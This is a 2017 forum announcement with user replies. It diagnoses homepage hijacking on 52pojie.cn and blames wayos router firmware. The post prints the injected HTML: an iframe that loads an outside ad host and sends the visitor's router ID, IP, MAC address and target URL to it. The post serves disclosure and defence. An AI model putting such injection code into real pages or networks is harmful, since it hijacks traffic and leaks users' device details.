吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 96223|回复: 390
收起左侧

【公告】访问吾爱破解被劫持到私服页面是“wayos维盟路由器”所为!

    [复制链接]
Hmily 发表于 2017-7-7 18:35
访问吾爱破解首页被劫持到私服页面是“wayos维盟路由器”所为!

起因:
最近几天,陆续在论坛、邮箱、微博、微信公众号等渠道收到很多用户反馈,访问吾爱首页的时候直接显示私服网站内容或者空白内容,通过刷新或者清除缓存都无法解决。
1.png

现象:
访问论坛首页http://www.52pojie.cn,显示私服页面


排查:
1、一眼看去,感觉就是运营商劫持,所以先让反馈的同学们用诊断工具进行诊断,从诊断日志上看不太像DNS劫持,IP解析也正常,http返回的状态也是200,但实际相应的http头已经不是我们服务器返回的内容了,劫持返回的http头内容如下:
HTTP/1.1 200 OK
Content-Type: text/html;charset=gb2312
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Server: wys
Content-Length: 562

明显看起来就是被劫持替换成其他劫持内容了,就是上面看到的私服广告页面(上面标红的内容是一个关键,后面会说到)。

2、今天通过远程定位发现劫持后的网页源代码如下:

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=gb2312"><TITLE></TITLE><style>body {overflow: hidden; height: 100%; margin: 0px;}</style></HEAD><BODY><iframe id="wys_gg_http_index_jsp" style="z-index:-1;visibility: inherit; width: 100%; height: 100%;" src="http://jl2y.emu-sz.com:7066/adv/202.jsp?uid=HYG-1000_RG361612157097DA4E&ip=172.16.20.62&mac=B0-25-AA-1E-23-4E&js=0&surl=www.52pojie.cn/" frameBorder=0 scrolling="auto"></iframe></BODY></HTML>

这个劫持还把用户的路由器信息、IP地址、MAC地址和劫持的网址都上传了。

3、通过搜索Server: wyswys_gg_http_index_jsp关键词信息,我们发现了很多相同劫持方法受害者发的帖子:
https://www.v2ex.com/t/96674
https://www.v2ex.com/t/78973
http://bbs.pxecn.com/thread-116285-1-1.html

看来这种劫持方式已经有很多年了,只是最近几天对吾爱下手了,顺藤摸瓜,发现这一切背后的黑手来自维盟路由器,也叫wayos(http://www.wayos.com),前面http头上的wys就是它们的缩写,在搜索引擎中搜索“wayos 劫持”,会看到非常多的用户反馈,通过搜索发现freebuf上还有一篇对路由器固件的简要技术分析http://www.freebuf.com/articles/terminal/113487.html ,D-Link路由器也用了wayos的固件,导致出现私服劫持,这次劫持的锅不用运营商背。

证实:
有了上面的基本分析,能确定是维盟路由器所为,为了落实我们让受害用户通过维盟网站上提供的客服电话进行反馈,维盟客服人员在电话中也毫不避讳的确认会劫持到私服网站,让用户打开路由器的远程功能,短短几秒钟就帮用户解决了劫持问题,通过多个用户验证,官方都通过设置路由器的方式,关闭了劫持,我们官方也进行了电话投诉咨询,客服给予的答复也是会劫持,但只能通过手动帮用户关闭路由器劫持功能,没有权限设置云端随时想劫持哪个网站的权限功能,只能尝试向“领导”反馈解决。

影响:
目前已经收到十几例反馈,并且劫持并不是随机,而是持续劫持,无法访问论坛,所以影响非常大,并且绝大多数都是小众宽带用户,小区宽带使用维盟路由器的概率很高,有的被劫持同学发现自己使用的不是维盟路由器,但也被劫持了,原因就是上层小区用了维盟路由器做分发(可以试试直接拨号来测试是否劫持,如果还劫持说明是上层路由器搞的)。劫持网站弹广告都小事,上传用户信息也不算太大事,但不包准出现恶意盗取用户密码网银设置钓鱼网站等恶意行为就是大事了,选择路由器需谨慎。

解决方案:
1、如果你用了维盟路由器,请拨打维盟客服热线 :4006125805 (09:00-22:00) http://www.wayos.com/about/contact.html ,告知客服路由器劫持了吾爱破解论坛www.52pojie.cn,官方客服会很热情的帮你解决问题。
2、如果你是小区这种小众宽带,也请拨打维盟客服热线 :4006125805 (09:00-22:00) http://www.wayos.com/about/contact.html ,告知客服路由器劫持了吾爱破解论坛www.52pojie.cn,看客服是否能直接处理,如果不行需要小区宽带的运营商,请和办理宽带的小区运营商来联系,让他们看这个帖子,通过联系客服来解决。
3、目前只有主页被劫持,其他页面还未劫持,临时可以通过http://www.52pojie.cn/forum.php页面访问。
4、我们会尽快上SSL,最近维护就是在做这方面的修改和测试,目前除了主站,其他二级域名已经全部SSL化了。

点评

原来就是这个原因,不过最近都没出现这些问题,还以为是电信的锅!!!  发表于 2017-7-8 17:28

免费评分

参与人数 149吾爱币 +142 热心值 +139 收起 理由
214000 + 1 + 1 用心讨论,共获提升!
yuguantoubanfan + 1 谢谢@Thanks!
xiaochiqing1 + 1 + 1 谢谢@Thanks!
13673353710 + 1 谢谢@Thanks!
by12777 + 1 + 1 谢谢@Thanks!
a94328942 + 1 谢谢@Thanks!
snowwindsand + 1 + 1 我很赞同!
lidong_123456 + 1 + 1 用心讨论,共获提升!
YINGDOBI + 1 + 1 好无奈
q1184333420 + 1 + 1 用心讨论,共获提升!
ZihangYang + 1 热心回复!
火丶柴 + 1 + 1 我很赞同!
howsk + 1 + 1 Sex、菠菜、Si服黑客多,技术强
丶Panda + 1 + 1 已答复!
for + 1 呵呵。向“领导”反应,这个是问题关键!
LoTai + 1 + 1 热心回复!
sakura_piggy + 1 谢谢@Thanks!
carlylezqy + 1 + 1 用心讨论,共获提升!
520小叮当 + 1 + 1 用心讨论,共获提升!
sjgxhm + 1 + 1 谢谢@Thanks!
骑蚂蚁战大象 + 1 + 1 论坛可以直接讲维盟拉黑了
gan0317 + 1 + 1 我很赞同!
jgl0301 + 1 + 1 我很赞同!
ayaselynn + 1 我很赞同!
四海少女の梦 + 1 + 1 用心讨论,共获提升!
hlsh + 1 + 1 用心讨论,共获提升!
Asdwe32 + 1 + 1 我很赞同!
唯三句 + 1 + 1 已答复!
hei6688 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
剑客文 + 1 我很赞同!
alexsky2011 + 1 + 1 用心讨论,共获提升!
跳跳的猪123 + 1 谢谢@Thanks!
linbuyi + 1 + 1 用心讨论,共获提升!
wall001pojie + 1 + 1 我很赞同!
妄我 + 1 + 1 已答复!
rainlee + 1 挂VPN没被劫持过
cjhzdq1 + 1 感觉这种赚钱的方式很恶心啊
h1a2c3k4 + 1 + 1 我很赞同!
迪哥V5 + 1 + 1 我很赞同!
zkall794613 + 1 + 1 谢谢
luwenkuo + 1 + 1 谢谢@Thanks!
中二杀神 + 1 + 1 热心回复!
方片国王 + 1 谢谢@Thanks!
wads10060 + 1 + 1 谢谢@Thanks!
cxt + 1 + 1 热心回复!
杨柳 + 1 + 1 谢谢@Thanks!
乐天骥 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
天游客 + 1 + 1 热心回复!
我是一枚小小白 + 1 + 1 谢谢@Thanks!
白二黑 + 1 热心回复!
a8692375 + 1 52加油
B1aN + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
林更新 + 1 + 1 用心讨论,共获提升!
蚂蚁牙黑 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
a73020 + 1 + 1 原来如此
新三人行 + 1 + 1 谢谢@Thanks!
初学者玄天 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
苏筱瑾 + 1 + 1 用心讨论,共获提升!
fox741520 + 1 + 1 用心讨论,共获提升!
ywsmart + 1 + 1 谢谢@Thanks!
beijixing1984 + 1 + 1 我很赞同!
taczer + 1 + 1 我很赞同!
yake240 + 1 + 1 我很赞同!
985552 + 1 + 1 热心回复!
a952779523 + 1 + 1 这就提醒了,安全问题不可忽视
gqdsc + 1 这个有点恐怖了
l281180570 + 1 + 1 目瞪口呆
a709447628 + 1 热心回复!
_达圣 + 1 + 1 我很赞同!
猪扒耀 + 1 + 1 谢谢@Thanks!
ly879924402 + 1 + 1 我很赞同!
a101023a + 1 + 1 我很赞同!
azhaoyu + 1 + 1 用心讨论,共获提升!
双面魅影 + 1 + 1 牛逼了
cqrlock2 + 1 + 1 热心回复!
内把破枪没带吧 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
goliang1086 + 1 + 1 谢谢@Thanks!
ipersistence + 1 + 1 发现问题,不断提高!
mrwinner + 1 + 1 我很赞同!
比企谷八幡 + 1 + 1 谢谢@Thanks!
tangdragon + 2 + 1 我很赞同!
rocknroll + 1 + 1 热心回复!
hsaihuaer + 1 + 1 谢谢@Thanks!
小豪君不行吗 + 1 + 1 我很赞同!
wangc + 1 + 1 谢谢@Thanks!
欧不二 + 1 + 1 谢谢@Thanks!
艾解CHO + 1 + 1 谢谢@Thanks!
wlpkcheng + 1 + 1 用户不是改不了 是他们不让用户改,有后门的设备谁敢用
guaiguai + 1 + 1 谢谢@Thanks!
Sun夜幕 + 1 用心讨论,共获提升!
夏日miku + 1 + 1 谢谢@Thanks!
好人要多点 + 1 + 1 已答复!
aaaaaw + 1 + 1 谨慎选择路由。
冰蓝幻想 + 1 + 1 谢谢@Thanks!
djlxue + 1 + 1 谢谢@Thanks!
天佑凡人 + 1 + 1 这才是吾爱大神 的风范!
特洛卡 + 1 + 1 谢谢@Thanks!
qs5f5l + 1 + 1 我很赞同!
ayaoko + 1 + 1 我很赞同!
cher + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

xyz1125 发表于 2017-7-7 23:49
坐等全站https
 楼主| Hmily 发表于 2017-7-7 19:06
longmarchw 发表于 2017-7-7 19:01
关键是,还有哪些品牌用到这种固件?都知道漏洞还不修复……监守自盗!!

这不是漏洞,就是别人利用来劫持刷广告的渠道,靠这个挣钱了。
likang 发表于 2017-7-7 21:20
可不可以顺便上升到http/2,减少些网络延迟。

点评

http2源站好上,但cdn不支持,没戏。  详情 回复 发表于 2017-7-7 21:29
vikaro 发表于 2017-7-7 19:01
我就是一个受害者,最近都访问不了吾爱论坛,吾爱通过邮件告知原因之后致电维盟,问了我的路由器型号和IP之后,直接远程解除了劫持,这样的路由器,还有谁敢用?

点评

放弃把,已经开始窃取上传用户资料 后续不敢想象  发表于 2017-7-8 09:05
烟99 发表于 2017-7-7 18:35
这种厂商太可恨了,建议H大举报给工信部
cunzher 发表于 2017-7-7 18:37
可恶啊,简直无耻
H夜 发表于 2017-7-7 18:37
本帖最后由 H夜 于 2017-7-7 18:39 编辑

膜拜老大!终于找出原因了
mengzhenhai 发表于 2017-7-7 18:47

马扎准备好了,前排出售瓜子饮料矿泉水,面包火腿方便面,都坐好坐好     

出现问题的同学可以按照帖子中给出的解决方法来进行解决         

点评

2个火腿肠 2碗红烧牛肉面 抓紧送过来  发表于 2017-7-8 09:06
无情绝恋 发表于 2017-7-7 18:57
虽然我这里没有出现这种问题,但是这路由器也太坑了吧
王美君 发表于 2017-7-7 18:59
黑心的商人啊
longmarchw 发表于 2017-7-7 19:01 来自手机
关键是,还有哪些品牌用到这种固件?都知道漏洞还不修复……监守自盗!!

点评

这不是漏洞,就是别人利用来劫持刷广告的渠道,靠这个挣钱了。  详情 回复 发表于 2017-7-7 19:06
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 提醒:禁止复制他人回复等『恶意灌水』行为,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 02:21

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表